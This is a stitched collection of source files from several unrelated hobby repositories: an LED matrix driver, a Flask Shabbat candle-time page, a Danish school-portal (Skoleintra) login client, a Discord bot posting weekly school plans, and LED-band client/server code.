gfx_set_px(start_x, start_y, state)
elif abs(len_x) > abs(len_y):
step_x = abs(len_x) / len_x
for g_x in range(start_x, end_x + incl_endpoint*step_x, step_x):
g_y = int(start_y + float(len_y) * (float(g_x - start_x)) / float(len_x) + 0.5)
if (g_x in gfx_columns) and (g_y in gfx_rows):
#if (0 <= g_x < 8*NUM_MATRICES) and (0<= g_y <8):
gfx_set_px(g_x, g_y, state)
else:
step_y = abs(len_y) / len_y
for g_y in range(start_y, end_y + incl_endpoint*step_y, step_y):
g_x = int(start_x + float(len_x) * (float(g_y - start_y)) / float(len_y) + 0.5)
if (g_x in gfx_columns) and (g_y in gfx_rows):
#if (0 <= g_x < 8*NUM_MATRICES) and (0<= g_y <8):
gfx_set_px(g_x, g_y, state)
def gfx_letter(char_code, start_x=0, state=GFX_INVERT, font=DEFAULT_FONT):
# Overlay one character from the specified font into the graphics buffer, at a specified horizontal position
# The character is drawn by setting each affected pixel to either on, off, or the inverse of its previous state
start_x = int(start_x)
for l_col in range(0,8):
if (l_col + start_x) in gfx_columns:
#if ((l_col + start_x) >= 0) and (l_col + start_x < NUM_MATRICES*8):
if state == GFX_ON:
gfx_buffer[l_col + start_x] = font[char_code][l_col]
elif state == GFX_OFF:
gfx_buffer[l_col + start_x] = (~font[char_code][l_col]) & 0xFF
elif state == GFX_INVERT:
gfx_buffer[l_col + start_x] = (gfx_buffer[l_col + start_x] ^ font[char_code][l_col]) & 0xFF
def gfx_sprite(sprite, start_x=0, state=GFX_INVERT):
# Overlay a specified sprite into the graphics buffer, at a specified horizontal position
# The sprite is drawn by setting each affected pixel to either on, off, or the inverse of its previous state
# Sprite is an 8-pixel (high) x n-pixel wide pattern, expressed as a list of n bytes eg [0x99, 0x66, 0x5A, 0x66, 0x99]
for l_col in range(0,len(sprite)):
if ((l_col + start_x) >= 0) and (l_col + start_x < NUM_MATRICES*8):
if state == GFX_ON:
gfx_buffer[l_col + start_x] = sprite[l_col]
elif state == GFX_OFF:
gfx_buffer[l_col + start_x] = (~sprite[l_col]) & 0xFF
elif state == GFX_INVERT:
gfx_buffer[l_col + start_x] = (gfx_buffer[l_col + start_x] ^ sprite[l_col]) & 0xFF
def gfx_scroll(direction=DIR_L, start_x=0, extent_x=8*NUM_MATRICES, start_y=0, extent_y=8, new_pixels=GFX_OFF):
# Scroll the specified area of the graphics buffer by one pixel in the given direction
# direction: any of DIR_U, DIR_D, DIR_L, DIR_R, DIR_LU, DIR_RU, DIR_RD, DIR_LD
# Pixels outside the rectangle are unaffected; pixels scrolled outside the rectangle are discarded
# The 'new' pixels in the gap created are either set to on or off depending upon the new_pixels argument
start_x = max(0, min(8*NUM_MATRICES - 1 , int(start_x)))
extent_x = max(0, min(8*NUM_MATRICES - start_x, int(extent_x)))
start_y = max(0, min(7, int(start_y)))
extent_y = max(0, min(8 - start_y, int(extent_y)))
mask = 0x00
for g_y in range(start_y, start_y + extent_y):
mask = mask | (0x01 << g_y)
if direction & DIR_L:
for g_x in range(start_x, start_x + extent_x - 1):
gfx_buffer[g_x] = (gfx_buffer[g_x] & ~mask) | (gfx_buffer[g_x + 1] & mask)
gfx_buffer[start_x + extent_x - 1] = gfx_buffer[start_x + extent_x - 1] & ~mask
if new_pixels == GFX_ON:
gfx_buffer[start_x + extent_x - 1] = gfx_buffer[start_x + extent_x - 1] | mask
elif direction & DIR_R:
for g_x in range(start_x + extent_x - 1, start_x, -1):
gfx_buffer[g_x] = (gfx_buffer[g_x] & ~mask) | (gfx_buffer[g_x - 1] & mask)
gfx_buffer[start_x] = gfx_buffer[start_x] & ~mask
if new_pixels == GFX_ON:
gfx_buffer[start_x] = gfx_buffer[start_x] | mask
if direction & DIR_U:
for g_x in range(start_x, start_x + extent_x):
gfx_buffer[g_x] = (gfx_buffer[g_x] & ~mask) | (((gfx_buffer[g_x] & mask) >> 1) & mask)
if new_pixels == GFX_ON:
gfx_buffer[g_x] = gfx_buffer[g_x] | (0x01 << (start_y + extent_y - 1))
elif direction & DIR_D:
for g_x in range(start_x, start_x + extent_x):
gfx_buffer[g_x] = (gfx_buffer[g_x] & ~mask) | (((gfx_buffer[g_x] & mask) << 1) & mask)
if new_pixels == GFX_ON:
gfx_buffer[g_x] = gfx_buffer[g_x] | (0x01 << start_y)
def gfx_read_buffer(g_x, g_y):
# Return the current state (on=True, off=False) of an individual pixel in the graphics buffer
# Note that this buffer only reflects the operations of these gfx_ functions, since the buffer was last cleared
# The buffer does not reflect the effects of other library functions such as send_matrix_letter() or (static_message()
if (g_x in gfx_columns) and (g_y in gfx_rows):
return (gfx_buffer[g_x] & (0x01 << g_y) != 0)
def gfx_render():
# All of the above gfx_ functions only write to (or read from) a graphics buffer maintained in memory
# This command sends the entire buffer to the matrix array - use it to display the effect of one or more previous gfx_ functions
for g_col in range(8):
column_data = []
for matrix in range(NUM_MATRICES):
column_data += [g_col+1, gfx_buffer[8*matrix + g_col]]
send_bytes(column_data)
def init():
# Initialise all of the MAX7219 chips (see datasheet for details of registers)
send_all_reg_byte(MAX7219_REG_SCANLIMIT, 7) # show all 8 digits
send_all_reg_byte(MAX7219_REG_DECODEMODE, 0) # using a LED matrix (not digits)
send_all_reg_byte(MAX7219_REG_DISPLAYTEST, 0) # no display test
clear_all() # ensure the whole array is blank
brightness(3) # set character intensity: range: 0..15
send_all_reg_byte(MAX7219_REG_SHUTDOWN, 1) # not in shutdown mode (i.e start it up)
gfx_set_all(GFX_OFF) # clear the graphics buffer
# -----------------------------------------------------
# Library function definitions end here
# The following script executes if run from command line
# ------------------------------------------------------
if __name__ == "__main__":
import sys
# Parse arguments and attempt to correct obvious errors
try:
# message text
message = sys.argv[1]
# number of marequu repeats
try:
repeats = abs(int(sys.argv[2]))
except (IndexError, ValueError):
repeats = 0
# speed of marquee scrolling
try:
speed = float(sys.argv[3])
except (IndexError, ValueError):
speed = 3
if speed < 1:
speed = 3
elif speed > 9:
speed = 9
# direction of marquee scrolling
try:
direction = sys.argv[4].lower()
if direction in ["dir_r", "dirr", "r", "right", ">", 2]:
direction = 2 # Right
else:
direction = 8 # Left
except (IndexError, ValueError):
direction = 8 # Left
# font
try:
font = sys.argv[5].lower()
if font in ["cp437", "cp437_font", "cp437font", "cp_437", "cp_437font", "cp_437_font"]:
font = CP437_FONT
elif font in ["sinclairs_font", "sinclairs", "sinclair_s", "sinclair_s_font", "sinclairsfont"]:
font = SINCLAIRS_FONT
elif font in ["lcd_font", "lcd", "lcdfont"]:
font = LCD_FONT
elif font in ["tiny_font", "tiny", "tinyfont"]:
font = TINY_FONT
# Note: if further fonts are added to MAX7219fonts.py, add suitable references to parse command line arguments here
else:
font = CP437_FONT
except (IndexError, ValueError):
font = CP437_FONT
# Call the marquee function with the parsed arguments
try:
scroll_message_horiz(message, repeats, speed, direction, font)
except KeyboardInterrupt:
clear_all()
except IndexError:
# If no arguments given, show help text
print "MAX7219array.py"
print "Scrolls a message across an array of MAX7219 8x8 LED boards"
print "Run syntax:"
print " python MAX7219array.py message [repeats [speed [direction [font]]]]"
print " or, if the file has been made executable with chmod +x MAX7219array.py :"
print " ./MAX7219array.py message [repeats [speed [direction [font]]]]"
print "Parameters:"
print " (none) : displays this help information"
print " message : any text to be displayed on the array"
print " if message is more than one word, it must be enclosed in 'quotation marks'"
print " Note: include blank space(s) at the end of 'message' if it is to be displayed multiple times"
print " repeats (optional) : number of times the message is scrolled"
print " repeats = 0 scrolls indefinitely until <Ctrl<C> is pressed"
print " if omitted, 'repeats' defaults to 0 (indefinitely)"
print " speed (optional) : how fast the text is scrolled across the array"
print " 1 (v.slow) to 9 (v.fast) inclusive (not necessarily integral)"
print " if omitted, 'speed' defaults to 3"
print " direction (optional) : direction the text is scrolled"
print " L or R - if omitted, 'direction' defaults to L"
print " font (optional) : font to use for the displayed text"
print " CP437, SINCLAIRS, LCD or TINY only - default 'font' if not recognized is CP437"
print "MAX7219array.py can also be imported as a module to provide a wider range of functions for driving the array"
print " See documentation within the script for details of these functions, and how to setup the library and the array"
``` |
{
"source": "jona42-ui/sabbath",
"score": 2
} |
#### File: jona42-ui/sabbath/application.py
```python
from symtable import SymbolTable
from xml.dom import NO_MODIFICATION_ALLOWED_ERR
from flask import Flask, flash, redirect, render_template, request, session, abort
from random import randint
import shabbos_web_class
import googleapi
app = Flask(__name__)
@app.route("/")
@app.route("/home")
def index():
#return name
Candletime = shabbos_web_class.return_candletime_string()
countdown = shabbos_web_class.time_remaining()
return render_template(
'index.html',**locals())
if __name__ == "__main__":
app.run()
```
#### File: jona42-ui/sabbath/shabbos_web_class.py
```python
import string
from grabIP import IPadd
def get_data():
import requests, json, datetime
#grabs your latitude, longitude and Time zone
current_year = datetime.datetime.now().strftime('%Y')
IP_data = IPadd()
loc_request=requests.get('http://ip-api.com/json/'+ IP_data)
type(loc_request)
loc_request.status_code==requests.codes.ok
loc_request_json_data = loc_request.text
Location_info = json.loads(loc_request_json_data)
# your location data
longi = str(Location_info['lon'])
latit = str(Location_info['lat'])
city = Location_info['city']
region = Location_info['timezone']
#using your location data to get customized shabbos data
#link is for master heb cal calendar api
heb_cal_address='http://www.hebcal.com/hebcal/?v=1&cfg=json&maj=on&min=on&mod=on&nx=on&year='+current_year+'&month=x&ss=on&mf=on&c=on&geo=pos&latitude=['+latit+']&longitude=['+longi+']&tzid=['+region+']&m=50&s=off'
import time, requests, datetime, json
res = requests.get(heb_cal_address)
# transform from none type to integer.
ready =int(json.loads(res.text))
data = ready.get('items')
return data, city
#beginning of main while loop that should hold until candles followed by havdala
def parse_data(data):
import requests, json, datetime, googleapi
for i in range(0, len(data)):
if data[i].get('category') == 'candles' or data[i].get('category') == 'havdalah':
date_retrival= data[i].get('date')
date_retrival2 = date_retrival.split('T')
time = date_retrival2[1].split('-')
date_plus_time = date_retrival2[0]+" "+ time[0]
date_obj = datetime.datetime.strptime(date_plus_time, '%Y-%m-%d %H:%M:%S')
event_date = date_obj.strftime('%A %B %d, %Y')
event_time = date_obj.strftime('%I:%M %p')
event_type = data[i].get('category')
#datetime changed to googleapi.local_time()for testing
if date_obj >= googleapi.local_time():
return event_date, event_time, event_type, date_obj
def return_candletime_string():
import datetime
info = get_data()
candletime = parse_data(info[0])
city = info[1]
event_type = candletime[2]
event_date = candletime[0]
event_time = candletime[1]
if event_type == 'candles':
event_type = "Candle lighting"
elif event_type == "havdalah":
event_type = "Havdalah"
else:
event_type = "Event"
return event_type + " in " + city + " on " + event_date + " will be at " + event_time
def time_remaining():
import googleapi
info = get_data()
candletime = parse_data(info[0])
date_obj = candletime[3]
return (date_obj)
"""
localtime = googleapi.local_time()
time_remain = date_obj - localtime
time_remain1 = str(time_remain).split(" ")
days_remain = time_remain1[0]
if days_remain == None or days_remain == 0:
days_remain = str("0")
hours_mins_remain = time_remain1[2].split(":")
hours_remain = hours_mins_remain[0]
if hours_remain == None or hours_remain == 0:
hours_remain == str("0")
minutes_remain = hours_mins_remain[1]
if minutes_remain == None or minutes_remain == 0:
minutes_remain == str("0")
seconds = hours_mins_remain[2]
fl_seconds_remain = float(seconds)
in_seconds_remain = int(fl_seconds_remain)
seconds_remain =str(in_seconds_remain)
return (days_remain, hours_remain, minutes_remain, seconds_remain, date_obj)
"""
"""
def timetil():
#grabs your latitude, longitude and Time zone
import requests, json, datetime
current_year = datetime.datetime.now().strftime('%Y')
loc_request=requests.get('http://ip-api.com/json')
type(loc_request)
loc_request.status_code==requests.codes.ok
loc_request_json_data = loc_request.text
Location_info = json.loads(loc_request_json_data)
# your location data
longi = str(Location_info['lon'])
latit = str(Location_info['lat'])
city = Location_info['city']
region = Location_info['timezone']
#using your location data to get customized shabbos data
#link is for master heb cal calendar api
heb_cal_address='http://www.hebcal.com/hebcal/?v=1&cfg=json&maj=on&min=on&mod=on&nx=on&year='+current_year+'&month=x&ss=on&mf=on&c=on&geo=pos&latitude=['+latit+']&longitude=['+longi+']&tzid=['+region+']&m=50&s=off'
#begin main loop
import json, requests, datetime, time
from subprocess import call
res = requests.get(heb_cal_address)
ready = json.loads(res.text)
data = ready.get('items')
#beginning of main while loop that should hold until candles followed by havdala
for i in range(0, len(data)):
if data[i].get('category') == 'candles' or data[i].get('category') == 'havdalah':
date_retrival = data[i].get('date')
date_retrival2 = date_retrival.split('T')
time = date_retrival2[1].split('-')
date_plus_time = date_retrival2[0] +" "+ time[0]
date_obj = datetime.datetime.strptime(date_plus_time, '%Y-%m-%d %H:%M:%S')
if date_obj >= datetime.datetime.now():
time_remain = date_obj - datetime.datetime.now()
time_remain1 = str(time_remain).split(" ")
days_remain = time_remain1[0]
hours_mins_remain = time_remain1[2].split(":")
hours_remain = hours_mins_remain[0]
minutes_remain = hours_mins_remain[1]
return "You have " + days_remain + " days, " + hours_remain + " hours, and " + minutes_remain +" minutes to go"
print(time_stmt)
print(timetil)
"""
``` |
{
"source": "jona799t/skoleintra-api",
"score": 3
} |
#### File: skoleintra-api/skoleintra/__init__.py
```python
import json
import httpx
import requests
import urllib
import ssl
from urllib3 import poolmanager
from bs4 import BeautifulSoup
from unilogin import Unilogin
class TLSAdapter(requests.adapters.HTTPAdapter): #https://stackoverflow.com/questions/61631955/python-requests-ssl-error-during-requests
def init_poolmanager(self, connections, maxsize, block=False):
"""Create and initialize the urllib3 PoolManager."""
ctx = ssl.create_default_context()
ctx.set_ciphers('DEFAULT@SECLEVEL=1')
self.poolmanager = poolmanager.PoolManager(
num_pools=connections,
maxsize=maxsize,
block=block,
ssl_version=ssl.PROTOCOL_TLS,
ssl_context=ctx)
class Skoleintra:
def __init__(self, url, type="elev", brugernavn="", adgangskode=""):
self.success = False
self.session = requests.session()
self.session.mount('https://', TLSAdapter())
self.uniloginClient = Unilogin(brugernavn=brugernavn, adgangskode=adgangskode)
self.defaultHeaders = {
"accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"accept-encoding": "gzip, deflate, br",
"accept-language": "da-DK,da;q=0.9,en-US;q=0.8,en;q=0.7",
"user-agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36"
}
if url[-1] == "/":
url = url[:-1]
if "https://" not in url and "http://" not in url:
url = "https://" + url
baseUrl = url.split("://")[1].split("/")[0]
if type == "elev":
url = f"{url}/Account/IdpLogin?role=Student&partnerSp=urn%3Aitslearning%3Ansi%3Asaml%3A2.0%3A{baseUrl}"
resp = self.session.get(url, headers=self.defaultHeaders, allow_redirects=False)
cookies = {"Pool": resp.cookies["Pool"], "SsoSessionId": resp.cookies["SsoSessionId"], "__RequestVerificationToken": resp.cookies["__RequestVerificationToken"]} #, "HasPendingSSO": resp.cookies["HasPendingSSO"]
href = f"https://{baseUrl}" + BeautifulSoup(resp.text, 'html.parser').find("a", {"class": "ccl-button sk-button-light-green sk-font-icon sk-button-text-only sk-uni-login-button"}).get("href")
headers = self.defaultHeaders
headers["cookie"] = f"Pool={cookies['Pool']}; SsoSessionId={cookies['SsoSessionId']}; __RequestVerificationToken={cookies['__RequestVerificationToken']}"
resp = self.session.get(href, headers=headers, allow_redirects=False)
location = resp.headers["location"]
authUrl = self.uniloginClient.login(href=location, referer=baseUrl)
resp = self.session.get(authUrl, headers=self.defaultHeaders, allow_redirects=False)
cookies["SsoSelectedSchool"] = resp.cookies["SsoSelectedSchool"]
cookies["UserRole"] = resp.cookies["UserRole"]
cookies["Language"] = resp.cookies["Language"]
cookies[".AspNet.SSO.ApplicationCookie"] = resp.cookies[".AspNet.SSO.ApplicationCookie"]
location = resp.headers["location"]
headers = self.defaultHeaders
headers["cookie"] = f"SsoSelectedSchool={cookies['SsoSelectedSchool']}; Language={cookies['Language']}; .AspNet.SSO.ApplicationCookie={cookies['.AspNet.SSO.ApplicationCookie']}"
resp = self.session.get(location, headers=headers, allow_redirects=False)
html = BeautifulSoup(resp.text, 'html.parser')
href = html.find('form').get('action')
samlResponse = [html.find("input", {"name": "SAMLResponse"}).get("name"), html.find("input", {"name": "SAMLResponse"}).get("value")]
replayState = [html.find("input", {"name": "RelayState"}).get("name"), html.find("input", {"name": "RelayState"}).get("value")]
payload = f"{samlResponse[0]}={urllib.parse.quote_plus(samlResponse[1])}&{replayState[0]}={urllib.parse.quote_plus(replayState[1])}"
headers = self.defaultHeaders
headers["content-length"] = str(len(payload))
headers["content-type"] = "application/x-www-form-urlencoded"
headers["cookie"] = f"Pool={cookies['Pool']}; SsoSessionId={cookies['SsoSessionId']}; __RequestVerificationToken={cookies['__RequestVerificationToken']}; SsoSelectedSchool={cookies['SsoSelectedSchool']}; UserRole={cookies['UserRole']}; Language={cookies['Language']}; .AspNet.SSO.ApplicationCookie={cookies['.AspNet.SSO.ApplicationCookie']}"
resp = self.session.post(href, headers=headers, data=payload, allow_redirects=False)
cookies[".AspNet.ApplicationCookie"] = resp.cookies[".AspNet.ApplicationCookie"]
self.cookies = cookies
self.success = True
def getWeeklyplans(self, week, year):
headers = {
"accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"accept-encoding": "gzip, deflate, br",
"accept-language": "da-DK,da;q=0.9,en-US;q=0.8,en;q=0.7",
"cookie": f"Pool={self.cookies['Pool']}; SsoSessionId={self.cookies['SsoSessionId']}; __RequestVerificationToken={self.cookies['__RequestVerificationToken']}; SsoSelectedSchool={self.cookies['SsoSelectedSchool']}; UserRole={self.cookies['UserRole']}; Language={self.cookies['Language']}; .AspNet.SSO.ApplicationCookie={self.cookies['.AspNet.SSO.ApplicationCookie']}; .AspNet.ApplicationCookie={self.cookies['.AspNet.ApplicationCookie']}",
"user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36",
}
resp = self.session.get(f"https://{self.cookies['SsoSelectedSchool']}/student/weeklyplans/list/item/class/{week}-{year}", headers=headers)
weeklyplan = json.loads(BeautifulSoup(resp.text, 'html.parser').find("div", {"id": "root"}).get("data-clientlogic-settings-weeklyplansapp"))
return weeklyplan
async def getWeeklyplansAsync(self, week, year):
if len(str(week)) == 1:
week = f"0{week}"
headers = {
"accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"accept-encoding": "gzip, deflate, br",
"accept-language": "da-DK,da;q=0.9,en-US;q=0.8,en;q=0.7",
"cookie": f"Pool={self.cookies['Pool']}; SsoSessionId={self.cookies['SsoSessionId']}; __RequestVerificationToken={self.cookies['__RequestVerificationToken']}; SsoSelectedSchool={self.cookies['SsoSelectedSchool']}; UserRole={self.cookies['UserRole']}; Language={self.cookies['Language']}; .AspNet.SSO.ApplicationCookie={self.cookies['.AspNet.SSO.ApplicationCookie']}; .AspNet.ApplicationCookie={self.cookies['.AspNet.ApplicationCookie']}",
"user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36",
}
async with httpx.AsyncClient() as client:
resp = await client.get(f"https://{self.cookies['SsoSelectedSchool']}/student/weeklyplans/list/item/class/{week}-{year}", headers=headers)
weeklyplan = json.loads(BeautifulSoup(resp.text, 'html.parser').find("div", {"id": "root"}).get("data-clientlogic-settings-weeklyplansapp"))
return weeklyplan
``` |
{
"source": "jona799t/skoleintra-ugeplan-discord-bot",
"score": 3
} |
#### File: jona799t/skoleintra-ugeplan-discord-bot/main.py
```python
import datetime
import json
import discord
import markdownify
from skoleintra import Skoleintra
from asyncer import asyncify
def stringify(html):
return markdownify.markdownify(html, heading_style="SETEXT").replace("\n\n", "\n")
config = json.load(open("config.json"))
if config["skoleintra"]["baseUrl"][-1] != "/":
config["skoleintra"]["baseUrl"] += "/"
skoleintraClient = Skoleintra(brugernavn=config["skoleintra"]["brugernavn"], adgangskode=config["skoleintra"]["adgangskode"], url=config["skoleintra"]["baseUrl"])
client = discord.Client()
@client.event
async def on_ready():
print(f'Logged in as {client.user}')
await client.change_presence(activity=discord.Activity(type=discord.ActivityType.listening, name="$help | Lavet af Jonathan#0008"))
@client.event
async def on_message(message):
if message.author == client.user:
return
if message.content.startswith('$help'):
embed = discord.Embed(title="Help", description="**$ugeplan**: *Giver ugeplanen fra den uge du er i (Med mindre det er weekend, så er det den næste)*\n\n**$ugeplan uge-år**: *Giver ugeplanen fra en given uge. Eksempel: ``$ugeplan 10-2022``*", color=discord.Color.from_rgb(26, 144, 130))
await message.reply(embed=embed)
elif message.content.startswith('$ugeplan'):
args = str(message.content).split(" ")
if len(args) == 1:
year, week, day_of_week = datetime.datetime.now().isocalendar()
if day_of_week > 5:
if week == 52:
week == 0
week += 1
elif len(args) == 2:
week = int(args[1].split("-")[0])
year = int(args[1].split("-")[1])
await message.add_reaction('👍')
print(f"Giver ugeplanen til @{message.author}")
ugeplan = await asyncify(skoleintraClient.getWeeklyplans)(week=week, year=year)
response = {"Klasse": ugeplan["SelectedPlan"]["ClassOrGroup"], "Uge": ugeplan["SelectedPlan"]["FormattedWeek"], "Ugeplan": {"General": []}}
i = 0
for lesson in ugeplan["SelectedPlan"]["GeneralPlan"]["LessonPlans"]:
response["Ugeplan"]["General"].append(
{"Lesson": lesson["Subject"]["Title"], "Content": stringify(lesson["Content"]),
"Attachments": []})
if lesson["Attachments"] != []:
for attachment in lesson["Attachments"]:
response["Ugeplan"]["General"][i]["Attachments"].append(config["skoleintra"]["baseUrl"] + attachment["Uri"])
i += 1
for plan in ugeplan["SelectedPlan"]["DailyPlans"]:
response["Ugeplan"][plan["FeedbackFormattedDate"]] = []
i = 0
for lesson in plan["LessonPlans"]:
response["Ugeplan"][plan["FeedbackFormattedDate"]].append(
{"Lesson": lesson["Subject"]["Title"], "Content": stringify(lesson["Content"]),
"Attachments": []})
if lesson["Attachments"] != []:
j = 0
for attachment in lesson["Attachments"]:
response["Ugeplan"][plan["FeedbackFormattedDate"]][i]["Attachments"].append(f'[{attachment["FileName"]}]({config["skoleintra"]["baseUrl"] + attachment["Uri"]})')
i += 1
i = 0
for day, lessons in response["Ugeplan"].items():
description = ""
for lesson in lessons:
description += f"**_{lesson['Lesson']}:_**\n{lesson['Content']}\n"
if lesson["Attachments"] != []:
description += "**Attachments:**"
for attachment in lesson["Attachments"]:
description += f"{attachment}"
description += "\n\n"
embed = discord.Embed(title=day.title(), description=description, color=discord.Color.from_rgb(26, 144, 130))
embed.set_author(name=f"{response['Klasse']}'s ugeplan", icon_url="https://cdn.discordapp.com/avatars/952176118713184276/e3f73d72b91c8a84c5c5ad4ae6053b53.webp?size=512")
if i == len(response["Ugeplan"])-1:
embed.set_footer(text=f"Opdateret: {datetime.datetime.now()}")
await message.channel.send(embed=embed)
i += 1
client.run(config["token"])
``` |
{
"source": "jonaan99/LEDband",
"score": 3
} |
#### File: client/libs/color_service.py
```python
import numpy as np
class ColorService():
def __init__(self, config):
self._config = config
self.full_gradients = {}
def build_gradients(self):
self.full_gradients = {}
for gradient in self._config["gradients"]:
not_mirrored_gradient = self._easing_gradient_generator(
self._config["gradients"][gradient], # All colors of the current gradient
self._config["device_config"]["LED_Count"]
)
# Mirror the gradient to get seemsles transition from start to the end
# [1,2,3,4]
# -> [1,2,3,4,4,3,2,1]
self.full_gradients[gradient] = np.concatenate(
(not_mirrored_gradient[:, ::-1], not_mirrored_gradient),
axis = 1
)
def _easing_gradient_generator(self, colors, length):
"""
returns np.array of given length that eases between specified colours
parameters:
colors - list, colours must be in self.config.colour_manager["colours"]
eg. ["Red", "Orange", "Blue", "Purple"]
length - int, length of array to return. should be from self.config.settings
eg. self.config.settings["devices"]["my strip"]["configuration"]["N_PIXELS"]
"""
def _easing_func(x, length, slope=2.5):
# returns a nice eased curve with defined length and curve
xa = (x/length)**slope
return xa / (xa + (1 - (x/length))**slope)
colors = colors[::-1] # needs to be reversed, makes it easier to deal with
n_transitions = len(colors) - 1
ease_length = length // n_transitions
pad = length - (n_transitions * ease_length)
output = np.zeros((3, length))
ease = np.array([_easing_func(i, ease_length, slope=2.5) for i in range(ease_length)])
# for r,g,b
for i in range(3):
# for each transition
for j in range(n_transitions):
# Starting ease value
start_value = colors[j][i]
# Ending ease value
end_value = colors[j+1][i]
# Difference between start and end
diff = end_value - start_value
# Make array of all start value
base = np.empty(ease_length)
base.fill(start_value)
# Make array of the difference between start and end
diffs = np.empty(ease_length)
diffs.fill(diff)
# run diffs through easing function to make smooth curve
eased_diffs = diffs * ease
# add transition to base values to produce curve from start to end value
base += eased_diffs
# append this to the output array
output[i, j*ease_length:(j+1)*ease_length] = base
# cast to int
output = np.asarray(output, dtype=int)
# pad out the ends (bit messy but it works and looks good)
if pad:
for i in range(3):
output[i, -pad:] = output[i, -pad-1]
return output
def colour(self, colour):
# returns the values of a given colour. use this function to get colour values.
if colour in self._config["colours"]:
return self._config["colours"][colour]
else:
print("colour {} has not been defined".format(colour))
return (0,0,0)
```
#### File: client/libs/notification_service.py
```python
from libs.notification_enum import NotificationEnum # pylint: disable=E0611, E0401
from time import sleep
class NotificationService():
def start(self, config_lock, notification_queue_effects_in, notification_queue_effects_out):
self._config_lock = config_lock
self._notification_queue_effects_in = notification_queue_effects_in
self._notification_queue_effects_out = notification_queue_effects_out
self._cancel_token = False
print("NotificationService component started.")
while not self._cancel_token:
# 1. Check Webserver
# 2. Check Output
# 3. Check Effects
sleep(0.5)
def stop(self):
self._cancel_token = True
def config_refresh(self):
# Summary
# 1. Pause every process that have to refresh the config.
# 2. Send the refresh command
# 3. Wait for all to finish the process.
# 4. Continue the processes.
# 1. Pause every process that have to refresh the config.
self._notification_queue_effects_in.put(NotificationEnum.process_pause)
# 2. Send the refresh command
self._notification_queue_effects_in.put(NotificationEnum.config_refresh)
# 3. Wait for all to finish the process.
processes_not_ready = True
output_ready = False
effect_ready = False
while processes_not_ready:
# Check the notification queue of effects, if it is ready to continue
if(not self._notification_queue_effects_out.empty()):
current_effects_out = self._notification_queue_effects_out.get()
if current_effects_out is NotificationEnum.config_refresh_finished:
effect_ready = True
if output_ready and effect_ready:
processes_not_ready = False
# 4. Continue the processes.
self._notification_queue_effects_in.put(NotificationEnum.process_continue)
```
#### File: client/libs/server_service.py
```python
import socket, pickle, struct
from time import sleep
import time
from subprocess import check_output
import sys
class ServerService:
def start(self, config_lock, notification_queue_in, notification_queue_out, server_queue, server_queue_lock):
self._config_lock = config_lock
self._notification_queue_in = notification_queue_in
self._notification_queue_out = notification_queue_out
self._server_queue = server_queue
self._server_queue_lock = server_queue_lock
ten_seconds_counter = time.time()
start_time = time.time()
self._frame_counter = 0
while True:
print("--- Try to connect with the server. ---")
try:
hostIP = socket.gethostbyname("raspi-led")
port = 65432
print("Connect to " + str(hostIP) + ":" + str(port))
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
sock.connect((hostIP, port))
while True:
output_array = None
self._server_queue_lock.acquire()
if not self._server_queue.empty():
output_array = self._server_queue.get()
self._server_queue_lock.release()
if output_array is None:
#print("Server Service | Output array is empty")
continue
self.sendArray(sock, output_array)
end_time = time.time()
if time.time() - ten_seconds_counter > 10:
ten_seconds_counter = time.time()
time_dif = end_time - start_time
fps = 1 / time_dif
print("Server Service | FPS: " + str(fps))
start_time = time.time()
except TimeoutError as ex:
print("Connection timed out.")
except:
print("Unexpected error in server service:" + str(sys.exc_info()[0]))
sleep(10)
def sendArray(self, sock, array):
# Send Array Data
sendData = pickle.dumps(array)
self.send_msg(sock, sendData)
def send_msg(self, sock, msg):
# Prefix each message with a 4-byte length (network byte order)
msg = struct.pack('>I', len(msg)) + msg
sock.sendall(msg)
```
#### File: server/libs/output.py
```python
import numpy as np
from numpy import asarray
from libs.config_service import ConfigService # pylint: disable=E0611, E0401
from libs.notification_enum import NotificationEnum # pylint: disable=E0611, E0401
from ctypes import c_uint8
import time
from time import sleep
import cProfile
import pprint
import array
class Output:
def manual_init(self):
import _rpi_ws281x as ws # pylint: disable=import-error
device_config = self._config["device_config"]
# LED strip configuration:
self._led_count = int(device_config["LED_Count"]) # Number of LED pixels.
self._led_pin = int(device_config["LED_Pin"]) # GPIO pin connected to the pixels (18 uses PWM!).
self._led_freq_hz = int(device_config["LED_Freq_Hz"]) # LED signal frequency in hertz (usually 800khz)
self._led_dma = int(device_config["LED_Dma"]) # DMA channel to use for generating signal (try 10)
self._led_brightness = int(device_config["LED_Brightness"]) # Set to 0 for darkest and 100 for brightest
self._led_invert = int(device_config["LED_Invert"]) # True to invert the signal (when using NPN transistor level shift)
self._led_channel = int(device_config["LED_Channel"]) # set to '1' for GPIOs 13, 19, 41, 45 or 53
self._led_brightness_translated = int(255 * (self._led_brightness / 100))
#self._led_brightness_translated = 255
print("LED Brightness: " + str(self._led_brightness))
print("LED Brightness Translated: " + str(self._led_brightness_translated))
self._leds = ws.new_ws2811_t()
self.channel = ws.ws2811_channel_get(self._leds, 0)
ws.ws2811_channel_t_count_set(self.channel, self._led_count)
ws.ws2811_channel_t_gpionum_set(self.channel, self._led_pin)
ws.ws2811_channel_t_invert_set(self.channel, self._led_invert)
ws.ws2811_channel_t_brightness_set(self.channel, self._led_brightness_translated)
ws.ws2811_t_freq_set(self._leds, self._led_freq_hz)
ws.ws2811_t_dmanum_set(self._leds, self._led_dma)
# Initialize library with LED configuration.
resp = ws.ws2811_init(self._leds)
if resp != ws.WS2811_SUCCESS:
message = ws.ws2811_get_return_t_str(resp)
raise RuntimeError('ws2811_init failed with code {0} ({1})'.format(resp, message))
def start(self, config_lock, notification_queue_in, notification_queue_out, output_queue, output_queue_lock):
print("Starting Output component..")
self._config_lock = config_lock
